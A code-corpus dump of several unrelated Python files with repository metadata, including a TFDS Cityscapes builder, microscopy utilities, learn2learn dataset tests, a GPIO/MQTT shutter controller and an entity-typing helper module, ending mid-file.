{'name': 'pole' , 'color': [153,153,153]},
{'name': 'traffic light', 'color': [250,170, 30]},
{'name': 'traffic sign' , 'color': [220,220, 0]},
{'name': 'vegetation' , 'color': [107,142, 35]},
{'name': 'terrain' , 'color': [152,251,152]},
{'name': 'sky' , 'color': [ 70,130,180]},
{'name': 'person' , 'color': [220, 20, 60]},
{'name': 'rider' , 'color': [255, 0, 0]},
{'name': 'car' , 'color': [ 0, 0,142]},
{'name': 'truck' , 'color': [ 0, 0, 70]},
{'name': 'bus' , 'color': [ 0, 60,100]},
{'name': 'train' , 'color': [ 0, 80,100]},
{'name': 'motorcycle' , 'color': [ 0, 0,230]},
{'name': 'bicycle' , 'color': [119, 11, 32]},
{'name': 'ignore' , 'color': [ 0, 0, 0]}]
class Cityscape(tfds.core.GeneratorBasedBuilder):
"""Short description of my dataset."""
VERSION = tfds.core.Version("1.0.0")
def _info(self):
return tfds.core.DatasetInfo(
builder=self,
# This is the description that will appear on the datasets page.
description=("This is the dataset for xxx. It contains yyy. The "
"images are kept at their original dimensions."),
# tfds.features.FeatureConnectors
features=tfds.features.FeaturesDict({
"image": tfds.features.Image(shape=(1024, 2048, 3)),
# Here, labels can be of 5 distinct values.
"label": tfds.features.Image(shape=(1024, 2048, 1)),
}),
# If there's a common (input, target) tuple from the features,
# specify them here. They'll be used if as_supervised=True in
# builder.as_dataset.
supervised_keys=("image", "label"),
# Homepage of the dataset for documentation
urls=["https://dataset-homepage.org"],
# Bibtex citation for the dataset
citation=r"""@article{my-awesome-dataset-2020,
author = {Smith, John},"}""",
)
def _split_generators(self, dl_manager):
# Use a pre-extracted local copy of the data (nothing is downloaded here)
extracted_path = "/home/nelson/Pictures/datasets/cityscape"
# Specify the splits
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
num_shards=10,
gen_kwargs={
"images_dir_path": os.path.join(extracted_path, "leftImg8bit/train"),
"labels": os.path.join(extracted_path, "gtFine/train"),
},
),
tfds.core.SplitGenerator(
name=tfds.Split.TEST,
num_shards=1,
gen_kwargs={
"images_dir_path": os.path.join(extracted_path, "leftImg8bit/val"),
"labels": os.path.join(extracted_path, "gtFine/val"),
},
),
]
def _generate_examples(self, images_dir_path, labels):
# Read the input data out of the source files
label_suffix = '_gtFine_labelTrainIds.png'
image_suffix = '_leftImg8bit.png'
key = 0
for label_path in tf.io.gfile.glob(labels+'/*/*'+label_suffix):
image_path = label_path.replace(label_suffix, image_suffix
).replace(labels, images_dir_path)
yield key, {
"image": image_path,
"label": label_path,
}
key += 1
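# Illustrative usage (a sketch; note that _split_generators reads from the
# hard-coded local path above instead of using dl_manager):
# builder = Cityscape(data_dir='~/tensorflow_datasets')
# builder.download_and_prepare()
# train_ds = builder.as_dataset(split='train', as_supervised=True)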
9cb42d7e7d29bdef3eb52b0cd527e745541b8523 | 4,697 | py | Python | scripts/utils.py | JIC-Image-Analysis/leaf-cell-polarisation-tensors | cf5495a77a0bb77aa99206146267e41995ee5ebd | [
"MIT"
] | null | null | null | scripts/utils.py | JIC-Image-Analysis/leaf-cell-polarisation-tensors | cf5495a77a0bb77aa99206146267e41995ee5ebd | [
"MIT"
] | null | null | null | scripts/utils.py | JIC-Image-Analysis/leaf-cell-polarisation-tensors | cf5495a77a0bb77aa99206146267e41995ee5ebd | [
"MIT"
] | null | null | null | """Utility functions."""
import os.path
import logging
import numpy as np
from jicbioimage.core.image import MicroscopyCollection
from jicbioimage.core.transform import transformation
from jicbioimage.core.io import (
AutoWrite,
FileBackend,
DataManager,
_md5_hexdigest_from_file,
)
from jicbioimage.transform import (
remove_small_objects,
max_intensity_projection,
invert,
)
HERE = os.path.dirname(os.path.realpath(__file__))
def get_data_manager():
"""Return a data manager."""
data_dir = os.path.abspath(os.path.join(HERE, "..", "data"))
if not os.path.isdir(data_dir):
raise(OSError("Data directory does not exist: {}".format(data_dir)))
backend_dir = os.path.join(data_dir, 'unpacked')
file_backend = FileBackend(backend_dir)
return DataManager(file_backend), backend_dir
def get_microscopy_collection_from_tiff(input_file):
"""Return microscopy collection from tiff file."""
data_manager, backend_dir = get_data_manager()
data_manager.load(input_file)
md5_hex = _md5_hexdigest_from_file(input_file)
manifest_path = os.path.join(backend_dir, md5_hex, "manifest.json")
microscopy_collection = MicroscopyCollection()
microscopy_collection.parse_manifest(manifest_path)
return microscopy_collection
def get_microscopy_collection_from_org(input_file):
"""Return microscopy collection from microscopy file."""
data_manager, _ = get_data_manager()
return data_manager.load(input_file)
def get_microscopy_collection(input_file):
name, ext = os.path.splitext(input_file)
ext = ext.lower()
if ext == '.tif' or ext == '.tiff':
logging.debug("reading in a tif file")
return get_microscopy_collection_from_tiff(input_file)
else:
logging.debug("reading in a microscopy file")
return get_microscopy_collection_from_org(input_file)
@transformation
def identity(image):
return image
@transformation
def threshold_abs(image, threshold):
"""Return image thresholded using the mean."""
return image > threshold
@transformation
def mask_from_large_objects(image, max_size):
tmp_autowrite = AutoWrite.on
AutoWrite.on = False
mask = remove_small_objects(image, min_size=max_size)
mask = invert(mask)
AutoWrite.on = tmp_autowrite
return mask
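# The test below exercises remove_large_objects, which is not defined in this
# module. A minimal sketch of the intended behaviour (drop connected
# components strictly larger than max_size); it calls skimage directly so it
# stays outside the AutoWrite transformation pipeline:
import skimage.morphology
def remove_large_objects(ar, max_size):
"""Return a copy of ar with connected objects larger than max_size removed."""
large = skimage.morphology.remove_small_objects(ar, min_size=max_size + 1)
return ar & ~large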
def test_remove_large_objects():
ar = np.array([[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[1, 0, 0, 0]], dtype=bool)
exp = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[1, 0, 0, 0]], dtype=bool)
out = remove_large_objects(ar, max_size=3)
print(out)
assert np.array_equal(out, exp)
@transformation
def remove_large_segments(segmentation, max_size):
for i in segmentation.identifiers:
region = segmentation.region_by_identifier(i)
if region.area > max_size:
segmentation[region] = 0
return segmentation
def segment_zslice(image):
"""Segment a zslice."""
tmp_autowrite = AutoWrite.on
AutoWrite.on = False
image = identity(image)
image = threshold_abs(image, 100)
image = remove_small_objects(image, min_size=500)
AutoWrite.on = tmp_autowrite
return image
def preprocess_zstack(zstack_proxy_iterator, cutoff):
"""Select the pixels where the signal is.
Note: the ``cutoff`` argument is currently unused; segment_zslice hardcodes
its own threshold of 100.
"""
raw = []
zstack = []
for proxy_image in zstack_proxy_iterator:
image = proxy_image.image
segmented = segment_zslice(image)
raw.append(image)
zstack.append(segmented)
return np.dstack(raw), np.dstack(zstack)
def get_wall_intensity_and_mask_images(microscopy_collection, channel):
"""
Return (wall_intensity2D, wall_intensity3D, wall_mask2D, wall_mask3D).
"""
wall_ziter = microscopy_collection.zstack_proxy_iterator(c=channel)
wall_intensity3D, wall_mask3D = preprocess_zstack(wall_ziter, 90)
wall_intensity2D = max_intensity_projection(wall_intensity3D)
wall_mask2D = max_intensity_projection(wall_mask3D)
return wall_intensity2D, wall_intensity3D, wall_mask2D, wall_mask3D
def get_marker_intensity_images(microscopy_collection, channel):
"""REturn (marker_intensity2D, marker_intensity3D) tuple."""
marker_intensity3D = microscopy_collection.zstack_array(c=channel)
marker_intensity2D = max_intensity_projection(marker_intensity3D)
return marker_intensity2D, marker_intensity3D
def marker_cell_identifier(marker_region, cells):
"""Return cell identifier of marker region."""
pos = marker_region.convex_hull.centroid
return cells[pos]
| 30.303226 | 76 | 0.70875 | 591 | 4,697 | 5.35533 | 0.250423 | 0.012638 | 0.01327 | 0.012638 | 0.265403 | 0.169984 | 0.123223 | 0.048657 | 0.048657 | 0.01327 | 0 | 0.017701 | 0.194166 | 4,697 | 154 | 77 | 30.5 | 0.818494 | 0.085587 | 0 | 0.175926 | 0 | 0 | 0.02787 | 0 | 0 | 0 | 0 | 0 | 0.009259 | 1 | 0.12963 | false | 0 | 0.064815 | 0.009259 | 0.324074 | 0.009259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cb4e7e16692d11e46d9cf8f2373fcd636831fcc | 831 | py | Python | cos/patches.py | baylee-d/cos.io | 3f88acb0feb7a167bf9e81c42e28f9d2d38bbd43 | [
"Apache-2.0"
] | null | null | null | cos/patches.py | baylee-d/cos.io | 3f88acb0feb7a167bf9e81c42e28f9d2d38bbd43 | [
"Apache-2.0"
] | null | null | null | cos/patches.py | baylee-d/cos.io | 3f88acb0feb7a167bf9e81c42e28f9d2d38bbd43 | [
"Apache-2.0"
] | null | null | null | from django.utils.html import strip_tags
def highlightingapply():
def highlight(self, text_block):
if not text_block:
return ''
self.text_block = strip_tags(text_block)
highlight_locations = self.find_highlightable_words()
found = False
for k, v in highlight_locations.items():
if len(v) != 0:
found = True
break
start_offset, end_offset = self.find_window(highlight_locations)
if found and len(text_block) > 50:
return self.render_html(highlight_locations, start_offset - 20,
end_offset)
else:
return self.render_html(highlight_locations, 0, 50)
from haystack.utils.highlighting import Highlighter
Highlighter.highlight = highlight
| 30.777778 | 75 | 0.616125 | 93 | 831 | 5.27957 | 0.462366 | 0.09165 | 0.052953 | 0.081466 | 0.154786 | 0.154786 | 0 | 0 | 0 | 0 | 0 | 0.01406 | 0.315283 | 831 | 26 | 76 | 31.961538 | 0.848858 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.35 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cb6b2fa52f4755d592b0155718670f52aeb9f41 | 5,242 | py | Python | tests/unit/data/metadataset_test.py | Brikwerk/learn2learn | 7997c13c26ec627d13ce77ba98427260df78ada8 | [
"MIT"
] | 1 | 2021-07-07T17:03:45.000Z | 2021-07-07T17:03:45.000Z | tests/unit/data/metadataset_test.py | Brikwerk/learn2learn | 7997c13c26ec627d13ce77ba98427260df78ada8 | [
"MIT"
] | null | null | null | tests/unit/data/metadataset_test.py | Brikwerk/learn2learn | 7997c13c26ec627d13ce77ba98427260df78ada8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import unittest
from unittest import TestCase
import learn2learn as l2l
import numpy as np
from numpy.testing import assert_array_equal
from learn2learn.data import MetaDataset
from .util_datasets import TestDatasets
class TestMetaDataset(TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.ds = TestDatasets()
cls.meta_tensor_dataset = MetaDataset(cls.ds.tensor_dataset)
cls.meta_str_dataset = MetaDataset(cls.ds.str_dataset)
cls.meta_alpha_dataset = MetaDataset(cls.ds.alphabet_dataset)
cls.mnist_dataset = MetaDataset(cls.ds.get_mnist())
cls.omniglot_dataset = MetaDataset(cls.ds.get_omniglot())
def test_fails_with_non_torch_dataset(self):
try:
MetaDataset(np.random.randn(100, 100))
return False
except TypeError:
return True
finally:
return False
def test_data_length(self):
self.assertEqual(len(self.meta_tensor_dataset), self.ds.n)
self.assertEqual(len(self.meta_str_dataset), self.ds.n)
self.assertEqual(len(self.meta_alpha_dataset), 26)
self.assertEqual(len(self.mnist_dataset), 60000)
self.assertEqual(len(self.omniglot_dataset), 32460)
def test_data_labels_length(self):
self.assertEqual(len(self.meta_tensor_dataset.labels), len(self.ds.tensor_classes))
self.assertEqual(len(self.meta_str_dataset.labels), len(self.ds.str_classes))
self.assertEqual(len(self.meta_alpha_dataset.labels), 26)
self.assertEqual(len(self.mnist_dataset.labels), len(self.ds.mnist_classes))
self.assertEqual(len(self.omniglot_dataset.labels), len(self.ds.omniglot_classes))
def test_data_labels_values(self):
self.assertEqual(sorted(self.meta_tensor_dataset.labels), sorted(self.ds.tensor_classes))
self.assertEqual(sorted(self.meta_str_dataset.labels), sorted(self.ds.str_classes))
self.assertEqual(sorted(self.meta_alpha_dataset.labels), sorted(self.ds.alphabets))
self.assertEqual(sorted(self.omniglot_dataset.labels), sorted(self.ds.omniglot_classes))
def test_get_item(self):
for i in range(5):
rand_index = np.random.randint(0, 26)
data, label = self.meta_alpha_dataset[rand_index]
assert_array_equal(data, [rand_index for _ in range(self.ds.features)])
self.assertEqual(label, chr(97 + rand_index))
def test_labels_to_indices(self):
self.meta_alpha_dataset.create_bookkeeping()
dict_label_to_indices = self.meta_alpha_dataset.labels_to_indices
self.assertEqual(sorted(list(dict_label_to_indices.keys())), self.ds.alphabets)
for key in dict_label_to_indices:
self.assertEqual(dict_label_to_indices[key][0], ord(key) - 97)
def test_union_metadataset(self):
for ds_class in [
l2l.vision.datasets.FC100,
l2l.vision.datasets.CIFARFS,
]:
datasets = [
ds_class('~/data', mode='train', download=True),
ds_class('~/data', mode='validation', download=True),
ds_class('~/data', mode='test', download=True),
]
datasets = [l2l.data.MetaDataset(ds) for ds in datasets]
union = l2l.data.UnionMetaDataset(datasets)
self.assertEqual(len(union), sum([len(ds) for ds in datasets]))
self.assertTrue(len(union.labels) == sum([len(ds.labels) for ds in datasets]))
self.assertTrue(len(union.indices_to_labels) == sum([len(ds.indices_to_labels) for ds in datasets]))
ref = datasets[1][23]
item = union[len(datasets[0]) + 23]
# self.assertTrue(item[1] == ref[1]) # Would fail, because labels are remapped.
self.assertTrue(np.linalg.norm(np.array(item[0]) - np.array(ref[0])) <= 1e-6)
ref = datasets[1][0]
item = union[len(datasets[0]) + 0]
# self.assertTrue(item[1] == ref[1]) # Would fail, because labels are remapped.
self.assertTrue(np.linalg.norm(np.array(item[0]) - np.array(ref[0])) <= 1e-6)
def test_filtered_metadataset(self):
for ds_class in [
l2l.vision.datasets.FC100,
l2l.vision.datasets.CIFARFS,
]:
datasets = [
ds_class('~/data', mode='train', download=True),
ds_class('~/data', mode='validation', download=True),
ds_class('~/data', mode='test', download=True),
]
datasets = [l2l.data.MetaDataset(ds) for ds in datasets]
union = l2l.data.UnionMetaDataset(datasets)
classes = datasets[1].labels
filtered = l2l.data.FilteredMetaDataset(union, classes)
self.assertEqual(len(filtered.labels), len(datasets[1].labels))
self.assertEqual(len(filtered), len(datasets[1]))
for label in filtered.labels:
self.assertTrue(label in datasets[1].labels)
self.assertEqual(
len(filtered.labels_to_indices[label]),
len(datasets[1].labels_to_indices[label])
)
if __name__ == '__main__':
unittest.main()
| 44.803419 | 112 | 0.643457 | 657 | 5,242 | 4.951294 | 0.179604 | 0.096834 | 0.077467 | 0.06763 | 0.580695 | 0.455579 | 0.376268 | 0.301568 | 0.27882 | 0.226253 | 0 | 0.018764 | 0.237505 | 5,242 | 116 | 113 | 45.189655 | 0.795096 | 0.033766 | 0 | 0.244898 | 0 | 0 | 0.016206 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 1 | 0.091837 | false | 0 | 0.071429 | 0 | 0.204082 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cb773294b5f9609161513dcd00107f097b6bbc0 | 4,974 | py | Python | shutter.py | devgiants/home-automation-items | c516e344d24649746af501d46b88fc1bc0ab3368 | [
"MIT"
] | null | null | null | shutter.py | devgiants/home-automation-items | c516e344d24649746af501d46b88fc1bc0ab3368 | [
"MIT"
] | null | null | null | shutter.py | devgiants/home-automation-items | c516e344d24649746af501d46b88fc1bc0ab3368 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import logging
import sys
import threading
from gpiozero import LED, Button
from signal import pause
class Shutter:
UP = 'open'
DOWN = 'close'
STOP = 'stop'
name = None
logger = None
buttonUp = None
buttonDown = None
relayUp = None
relayDown = None
timeout = None
timer = None
mqttClient = None
mqttTopicToListen = None
mqttTopicToReport = None
def registerGpi(self, buttonUpPinNumber, buttonDownPinNumber):
self.buttonUp = Button(buttonUpPinNumber)
self.buttonDown = Button(buttonDownPinNumber)
self.logger.debug(
'Link GPI {}:{}, {}:{}'.format(
'button up', buttonUpPinNumber,
'button down', buttonDownPinNumber
)
)
self.buttonUp.when_pressed = lambda button: self.__upManualAction(button)
self.buttonDown.when_pressed = lambda button: self.__downManualAction(button)
self.buttonUp.when_released = lambda button: self.__stopManualAction(button)
self.buttonDown.when_released = lambda button: self.__stopManualAction(button)
def registerMqtt(self, client, mqttTopicToListen, mqttTopicToReport):
self.mqttClient = client
self.mqttTopicToListen = mqttTopicToListen
self.mqttTopicToReport = mqttTopicToReport
self.mqttSubscribe()
self.logger.debug('Register MQTT topic listening on topic {} (feedback {})'.format(self.mqttTopicToListen, self.mqttTopicToReport))
def mqttSubscribe(self):
self.mqttClient.subscribe(self.mqttTopicToListen)
self.mqttClient.message_callback_add(self.mqttTopicToListen, self.__handleMqttMessage)
def __init__(self, name, relayUpPinNumber, relayDownPinNumber, timeout = 30):
self.name = name
self.relayUp = LED(relayUpPinNumber, False)
self.relayDown = LED(relayDownPinNumber, False)
self.timeout = timeout
self.__initLogger()
self.logger.debug(
'Create shutter with {}:{}, {}:{}'.format(
'relay up', relayUpPinNumber,
'relay down', relayDownPinNumber
)
)
def __initLogger(self):
print(self.name)
self.logger = logging.getLogger(self.name)
self.logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] [{}] [%(name)s] %(levelname)s %(message)s'.format(__name__), datefmt='%d-%m-%Y %H:%M:%S')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
def __stopManualAction(self, buttonReleased):
self.__stop()
self.logger.debug('Manual stop (pin {})'.format(buttonReleased.pin))
def __stopTimerAction(self):
self.logger.debug('Timer stop')
self.__stop()
def __stopMqttAction(self):
self.logger.debug('MQTT stop')
self.__stop()
def __stop(self):
self.relayDown.off()
self.relayUp.off()
self.__sendFeedback(self.STOP)
if isinstance(self.timer, threading.Timer):
self.timer.cancel()
def __upManualAction(self, buttonUp):
self.logger.debug('Manual up (pin {})'.format(buttonUp.pin))
self.__up()
def __upMqttAction(self):
self.logger.debug('MQTT up')
self.__up()
def __up(self):
self.relayUp.on()
self.relayDown.off()
self.__sendFeedback(self.UP)
self.__startTimer()
def __downManualAction(self, buttonDown):
self.logger.debug('Manual down (pin {})'.format(buttonDown.pin))
self.__down()
def __downMqttAction(self):
self.logger.debug('MQTT down')
self.__down()
def __down(self):
self.relayUp.off()
self.relayDown.on()
self.__sendFeedback(self.DOWN)
self.__startTimer()
def __startTimer(self):
self.logger.debug('Start timer for {}s'.format(self.timeout))
self.timer = threading.Timer(self.timeout, self.__stopTimerAction)
self.timer.start()
def __handleMqttMessage(self, client, userdata, message):
if message.topic == self.mqttTopicToListen:
payloadDecoded = message.payload.decode("utf-8")
if payloadDecoded == self.UP:
self.__upMqttAction()
if payloadDecoded == self.DOWN:
self.__downMqttAction()
if payloadDecoded == self.STOP:
self.__stopMqttAction()
def __sendFeedback(self, message):
self.logger.debug('Send feedback on {}:{}'.format(self.mqttTopicToReport, message))
self.mqttClient.publish(self.mqttTopicToReport, message) | 34.068493 | 146 | 0.608162 | 466 | 4,974 | 6.306867 | 0.238197 | 0.051038 | 0.061245 | 0.032324 | 0.09425 | 0.034025 | 0.034025 | 0 | 0 | 0 | 0 | 0.001123 | 0.283876 | 4,974 | 146 | 147 | 34.068493 | 0.823975 | 0.003418 | 0 | 0.12931 | 0 | 0 | 0.074642 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155172 | false | 0 | 0.043103 | 0 | 0.327586 | 0.008621 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
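# Illustrative wiring (a sketch; pin numbers, topics, and the MQTT client
# object are assumptions):
# shutter = Shutter('living_room', relayUpPinNumber=17, relayDownPinNumber=27)
# shutter.registerGpi(buttonUpPinNumber=5, buttonDownPinNumber=6)
# shutter.registerMqtt(mqtt_client, 'home/shutter/living_room/set',
#                      'home/shutter/living_room/state')
# pause()  # from signal; blocks the main thread while gpiozero/MQTT callbacks run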
9cb8db803f38715facca07d97b74c472e6e12272 | 416 | py | Python | py_ws/sep_while.py | hjhan/python-for-kids | 51d8cb3361fc7b7c4fb0a714670498450611d219 | [
"MIT"
] | null | null | null | py_ws/sep_while.py | hjhan/python-for-kids | 51d8cb3361fc7b7c4fb0a714670498450611d219 | [
"MIT"
] | null | null | null | py_ws/sep_while.py | hjhan/python-for-kids | 51d8cb3361fc7b7c4fb0a714670498450611d219 | [
"MIT"
] | null | null | null | # print("请输入一个正整数:", end=' ')
n = int(input("请输入一个正整数:"))
i = 0
digits = [] # list
while (n >= 10 ** i):
# digit = int(n % 10 ** (i + 1) / 10 ** i)
digit = n % 10 ** (i + 1) // 10 ** i # extract each digit
#digits.insert(0, digit)
digits.append(digit)
i += 1
print("每位为%s" % digits)
num_digits = len(digits) # avoid shadowing the built-in len
total = 0 # avoid shadowing the built-in sum
for i in range(num_digits):
total += digits[i] * 10 ** (num_digits - i - 1)
print(total)
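# Example run (illustrative): entering 405 prints the digits [5, 0, 4] and
# then rebuilds and prints 405.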
| 23.111111 | 52 | 0.478365 | 64 | 416 | 3.109375 | 0.390625 | 0.075377 | 0.060302 | 0.050251 | 0.080402 | 0.080402 | 0 | 0 | 0 | 0 | 0 | 0.065517 | 0.302885 | 416 | 17 | 53 | 24.470588 | 0.62069 | 0.257212 | 0 | 0 | 0 | 0 | 0.048951 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cbc945a0d3063f43ad61663e0acc93e00ed41c0 | 6,742 | py | Python | src/HAnDS/helper.py | abhipec/hands | ff9658d4226c78b96c02ccf3b91b7d2699f0e4cf | [
"MIT"
] | 13 | 2019-05-02T01:44:04.000Z | 2022-02-21T13:39:47.000Z | src/HAnDS/helper.py | abhipec/hands | ff9658d4226c78b96c02ccf3b91b7d2699f0e4cf | [
"MIT"
] | 1 | 2021-06-01T13:04:51.000Z | 2021-06-08T16:07:35.000Z | src/HAnDS/helper.py | abhipec/hands | ff9658d4226c78b96c02ccf3b91b7d2699f0e4cf | [
"MIT"
] | 1 | 2019-12-26T07:24:03.000Z | 2019-12-26T07:24:03.000Z | """
Contains various helper functions related to the CADS framework.
"""
import os
import errno
import pickle
from nameparser import HumanName
#pylint:disable=raising-bad-type
def ensure_directory(directory):
"""
Create the directories along the provided directory path that do not exist.
"""
directory = os.path.expanduser(directory)
try:
os.makedirs(directory)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise exception
#pylint:enable=raising-bad-type
def prepare_dictionaries(master_dictionary_path, mapping_file):
"""
Load necessary dictionary.
"""
with open(master_dictionary_path, 'rb') as file_p:
md = pickle.load(file_p)#pylint:disable=invalid-name
#pylint:enable=invalid-name
redirect_to_title = {}
surface_names_to_titles = {}
for title in md:
for redirect in md[title]['alternate_titles']:
redirect_to_title[redirect] = title
if 'surface_names' in md[title]:
for name in md[title]['surface_names']:
if name not in surface_names_to_titles:
surface_names_to_titles[name] = set()
surface_names_to_titles[name].add(title)
mapping = {}
with open(mapping_file) as file_p:
for row in filter(None, file_p.read().split('\n')):
if len(row.split('\t')) == 2:
fb_label, figer_label = row.split('\t')
mapping[fb_label] = figer_label
else:
mapping[row] = row
return {
'md' : md,
'rtt' : redirect_to_title,
'sntt' : surface_names_to_titles,
'lmap' : mapping
}
def get_actual_title(link, dictionaries):
"""
Return actual title of wiki page link if exists.
"""
if link not in dictionaries['md']:
if link not in dictionaries['rtt']:
link = None
else:
link = dictionaries['rtt'][link]
return link
def map_labels(labels, mapping):
"""
Map a list of labels to their dictionary values, keeping only labels present in the mapping.
"""
mapped_labels = set()
for label in [mapping[x] for x in labels if mapping.get(x, 0)]:
mapped_labels.add(label)
return mapped_labels
def lowercase_support_confidence(link, dictionaries):
"""
Compute support and confidence of lowercase surface names.
"""
link = get_actual_title(link, dictionaries)
surface_names = dictionaries['md'][link]['surface_names']
lower_case_count = 0
total = 0
for name in surface_names:
if name.islower():
lower_case_count += surface_names[name]
total += surface_names[name]
return lower_case_count, (lower_case_count / total) * 100
def is_title_entity(link, dictionaries):
"""
Return status of link.
0 : Not entity
1 : Entity
-1 : Couldn't infer. Discard.
"""
link = get_actual_title(link, dictionaries)
if not link:
return -1
labels = dictionaries['md'][link]['labels']
mapped_labels = map_labels(labels, dictionaries['lmap'])
if mapped_labels:
return 1
# A special case
if '/government/political_ideology' in labels:
return 0
try:
support, confidence = lowercase_support_confidence(link, dictionaries)
except KeyError:
return -1
if support > 50 and confidence > 50:
return 0
return -1
def parse_title(title, dictionaries):
"""
Parse a Wikipedia page title or redirect.
"""
correct_names = set()
label_set = set(dictionaries['md'][get_actual_title(title, dictionaries)].get('labels', ''))
title = title.replace('_', ' ')
# remove the part of the title that is in round brackets, e.g. Rice (novel)
filtered_title = title[:title.find('(')].strip() if '(' in title else title
# if first character is '(', then do not remove round brackets
if not filtered_title:
filtered_title = title
correct_names.add(filtered_title)
correct_names.add(filtered_title.lower())
# If type person, add first and last name
if '/people/person' in label_set and '/organization' not in label_set\
and '/location' not in label_set:
name = HumanName(filtered_title)
correct_names.add(name.first)
correct_names.add(name.last)
return correct_names
def generate_candidate_names(title, dictionaries):
"""
Return a set of possible referent names of a Wikipedia title.
"""
names = set()
names.update(parse_title(title, dictionaries))
# add redirect names
for redirect in dictionaries['md'][title]['alternate_titles']:
names.update(parse_title(redirect, dictionaries))
return set(filter(None, names))
def is_surface_name_referential(name, link, dictionaries):
"""
Returns True if the surface name matches one of the candidate names.
"""
title = get_actual_title(link, dictionaries)
candidate_names = generate_candidate_names(title, dictionaries)
if name in candidate_names or name.lower() in candidate_names:
return True
return False
def separate_links(link_set, dictionaries):
"""
Partition link_set into entity, non-entity and discarded sets.
"""
entities = set()
non_entities = set()
discard_entities = set()
for link in link_set:
status = is_title_entity(link, dictionaries)
if status == 1:
entities.add(get_actual_title(link, dictionaries))
elif status == 0:
non_entities.add(get_actual_title(link, dictionaries))
else:
discard_entities.add(link)
return (entities, non_entities, discard_entities)
def is_entity_lowercase_dominant(link, dictionaries):
"""
Return True if, in more than 50% of its surface names, the
entity is expressed as lowercase words.
"""
try:
names = dictionaries['md'][get_actual_title(link, dictionaries)]['surface_names']
except KeyError:
# print(link)
return False
total = 0
lowercase = 0
for name in names:
if name.islower():
lowercase += names[name]
total += names[name]
if (lowercase / total) > 0.5:
return True
return False
def return_mapped_labels(link, dictionaries):
"""
Return label set assigned by KB.
"""
title = get_actual_title(link, dictionaries)
if title is None:
return set()
labels = dictionaries['md'][title].get('labels', set())
mapped_labels = map_labels(labels, dictionaries['lmap'])
return mapped_labels
def return_parent_label(label):
"""
Example:
Input: /education/department
Output: /education
"""
if label.count('/') > 1:
return label[0:label.find('/', 1)]
return label
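def _example_parent_label():
    """Doctest-style check of the example documented above."""
    assert return_parent_label('/education/department') == '/education'
    assert return_parent_label('/education') == '/education'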
| 29.831858 | 96 | 0.641946 | 831 | 6,742 | 5.043321 | 0.220217 | 0.061083 | 0.030064 | 0.034359 | 0.211644 | 0.101408 | 0.060129 | 0 | 0 | 0 | 0 | 0.006181 | 0.256155 | 6,742 | 225 | 97 | 29.964444 | 0.829511 | 0.171611 | 0 | 0.212766 | 0 | 0 | 0.04169 | 0.005609 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092199 | false | 0 | 0.028369 | 0 | 0.276596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cbd9e49ae6c4d9c717ce04a992db53d48888f0a | 17,459 | py | Python | design.py | tvanzyl/adaptive_bandwidth_kde | 8aef713b78705ac3192bf5eb6b42b93b3611d8dc | [
"MIT"
] | null | null | null | design.py | tvanzyl/adaptive_bandwidth_kde | 8aef713b78705ac3192bf5eb6b42b93b3611d8dc | [
"MIT"
] | null | null | null | design.py | tvanzyl/adaptive_bandwidth_kde | 8aef713b78705ac3192bf5eb6b42b93b3611d8dc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 6 16:59:19 2016
@author: tvzyl
"""
import data
from sklearn.datasets import make_spd_matrix
from pandas import DataFrame
from numpy import mean, diag, eye, rot90, dot, array, abs
from numpy import zeros, ones, arange
from numpy.random import uniform
from scipy.stats import entropy
from sklearn.utils.extmath import cartesian
from sklearn.neighbors import KDTree
class Experiment():
def __init__(self, n_training, n_test, dimensions, actualsEstimator, name):
